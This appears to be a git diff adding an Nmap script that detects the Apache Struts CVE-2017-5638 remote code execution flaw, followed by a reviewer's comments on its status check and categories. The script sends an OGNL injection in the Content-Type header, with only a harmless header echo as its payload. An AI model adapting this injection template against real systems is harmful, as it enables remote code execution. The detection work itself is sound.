diff --git a/CHANGELOG b/CHANGELOG
index 6dfaa49af..d810734ad 100644
--- a/CHANGELOG
+++ b/CHANGELOG
@@ -1,5 +1,8 @@
 # Nmap Changelog ($Id$); -*-text-*-
+o [NSE][GH#740] New script http-vuln-cve2017-5638 checks for the RCE bug in
+ Apache Struts. [Seth Jackson]
+
 o [NSE] Added several commands to redis-info to extract listening addresses, connected clients, active channels, and cluster nodes. [Vasiliy Kulikov]
diff --git a/scripts/http-vuln-cve2017-5638.nse b/scripts/http-vuln-cve2017-5638.nse
new file mode 100644
index 000000000..4d9cb1092
--- /dev/null
+++ b/scripts/http-vuln-cve2017-5638.nse
@@ -0,0 +1,75 @@
+description = [[
+Detects whether the specified URL is vulnerable to the Apache Struts
+Remote Code Execution Vulnerability (CVE-2017-5638).
+]]
+
+local http = require "http"
+local shortport = require "shortport"
+local vulns = require "vulns"
+local stdnse = require "stdnse"
+local string = require "string"
+
+---
+-- @usage
+-- nmap -p --script http-vuln-cve2017-5638
+--
+-- @output
+-- PORT STATE SERVICE
+-- 80/tcp open http
+-- | http-vuln-cve2017-5638:
+-- | VULNERABLE
+-- | Apache Struts Remote Code Execution Vulnerability
+-- | State: VULNERABLE
+-- | IDs: CVE:CVE-2017-5638
+-- |
+-- | Disclosure date: 2017-03-07
+-- | References:
+-- | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638
+-- | https://cwiki.apache.org/confluence/display/WW/S2-045
+-- |_ http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html
+--
+-- @args http-vuln-cve2017-5638.path The URL path to request. The default path is "/".
+
+author = "Seth Jackson"
+license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
+categories = { "vuln" }
+
+portrule = shortport.http
+
+action = function(host, port)
+ local vuln = {
+ title = "Apache Struts Remote Code Execution Vulnerability",
+ state = vulns.STATE.NOT_VULN,
+ description = [[
+Apache Struts 2.3.5 - Struts 2.3.31 and Apache Struts 2.5 - Struts 2.5.10 are vulnerable to a Remote Code Execution
+vulnerability via the Content-Type header.
+ ]],
+ IDS = {
+ CVE = "CVE-2017-5638"
+ },
+ references = {
+ 'https://cwiki.apache.org/confluence/display/WW/S2-045',
+ 'http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html'
+ },
+ dates = {
+ disclosure = { year = '2017', month = '03', day = '07' }
+ }
+ }
+
+ local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
+
+ local path = stdnse.get_script_args(SCRIPT_NAME..".path") or "/"
+ local value = stdnse.generate_random_string(8)
+
+ local header = {
+ ["Content-Type"] = string.format("%%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Check-Struts', '%s')}.multipart/form-data", value)
+ }
+
+ local response = http.post(host, port, path, { header = header })
+
+ if response and response.status == 200 and response.header["x-check-struts"] == value then
+ vuln.state = vulns.STATE.VULN
+ end
+
+ return vuln_report:make_output(vuln)
+end
diff --git a/scripts/script.db b/scripts/script.db
index ae825b5f6..15181094a 100644
--- a/scripts/script.db
+++ b/scripts/script.db
@@ -261,6 +261,7 @@ Entry { filename = "http-vuln-cve2014-3704.nse", categories = { "exploit", "intr
 Entry { filename = "http-vuln-cve2014-8877.nse", categories = { "exploit", "intrusive", "vuln", } }
 Entry { filename = "http-vuln-cve2015-1427.nse", categories = { "intrusive", "vuln", } }
 Entry { filename = "http-vuln-cve2015-1635.nse", categories = { "safe", "vuln", } }
+Entry { filename = "http-vuln-cve2017-5638.nse", categories = { "vuln", } }
 Entry { filename = "http-vuln-misfortune-cookie.nse", categories = { "intrusive", "vuln", } }
 Entry { filename = "http-vuln-wnr1000-creds.nse", categories = { "exploit", "intrusive", "vuln", } }
 Entry { filename = "http-waf-detect.nse", categories = { "discovery", "intrusive", } }
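Review bot: The verdict at `if response and response.status == 200 and response.header["x-check-struts"] == value then` ties detection to a 200 status, which looks like a false-negative source: the injected OGNL is evaluated while the multipart Content-Type is being parsed, before any action is dispatched, so a vulnerable host may answer 404 or 500 for the probed path and still carry the injected `X-Check-Struts` header. The echo of the random value in that header is the actual evidence, so I would drop the status condition: `if response and response.header["x-check-struts"] == value then`. Separately, the script executes attacker-supplied OGNL on the target yet is tagged only `categories = { "vuln" }` (mirrored in the script.db entry), while the neighbouring non-safe vuln checks in script.db also carry `intrusive`; Nmap's convention is that a script not marked `safe` is `intrusive`, so `categories = { "vuln", "intrusive" }` plus the matching script.db line would be more accurate. Lastly, `value` is spliced into a single-quoted OGNL literal, so the probe silently fails if the random charset ever includes a quote; the default set is presumably alphanumeric, but that dependency deserves a comment such as `-- value must stay alphanumeric: it is embedded in a single-quoted OGNL string`.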